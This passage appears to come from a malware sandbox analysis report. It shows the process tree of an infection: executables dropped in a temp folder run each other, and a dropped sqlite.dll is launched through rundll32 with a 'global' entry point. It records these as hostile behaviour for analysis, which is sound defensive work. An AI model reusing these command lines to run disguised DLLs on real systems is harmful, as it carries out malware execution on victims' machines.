      Command line: C:\Windows\system32\cmd.exe /c Wed12bf97133ddde4842.exe
      PID: 1356
      - Loads dropped DLL
      C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12bf97133ddde4842.exe (depth 4)
        Command line: Wed12bf97133ddde4842.exe
        PID: 2020
        - Executes dropped EXE

C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12640230114af0.exe (depth 1)
  Command line: Wed12640230114af0.exe
  PID: 1180
  - Executes dropped EXE
  - Loads dropped DLL
  C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12640230114af0.exe (depth 2)
    Command line: "C:\Users\Admin\AppData\Local\Temp\7zS032B36B5\Wed12640230114af0.exe" -u
    PID: 1460
    - Executes dropped EXE
    - Loads dropped DLL

C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  PID: 2676
  - Process spawned unexpected child process
  - Executes dropped EXE
  - Loads dropped DLL
  C:\Windows\SysWOW64\rundll32.exe (depth 2)
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    PID: 984
    - Loads dropped DLL

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService
  PID: 1280
  C:\Windows\system32\WerFault.exe (depth 2)
    Command line: C:\Windows\system32\WerFault.exe -u -p 1280 -s 1176
    PID: 3052
    - Program crash

C:\Windows\system32\rundll32.exe (depth 1)
  Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  PID: 3748
  - Process spawned unexpected child process
  C:\Windows\SysWOW64\rundll32.exe (depth 2)
    Command line: rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
    PID: 3764

C:\Windows\system32\LogonUI.exe (depth 1)
  Command line: "LogonUI.exe" /flags:0x0
  PID: 3340

C:\Windows\system32\svchost.exe (depth 1)
  Command line: C:\Windows\system32\svchost.exe -k SystemNetworkService
  PID: 3232